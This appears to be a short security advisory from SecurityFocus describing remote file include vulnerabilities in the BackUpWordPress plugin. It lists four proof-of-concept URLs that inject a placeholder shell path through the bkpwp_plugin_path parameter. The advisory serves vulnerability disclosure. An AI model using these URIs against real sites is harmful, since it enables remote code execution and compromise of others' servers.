BackUpWordPress Bkpwp_Plugin_Path Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://www.example.com/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://www.example.com/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://www.example.com/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?


 

Privacy Statement
Copyright 2010, SecurityFocus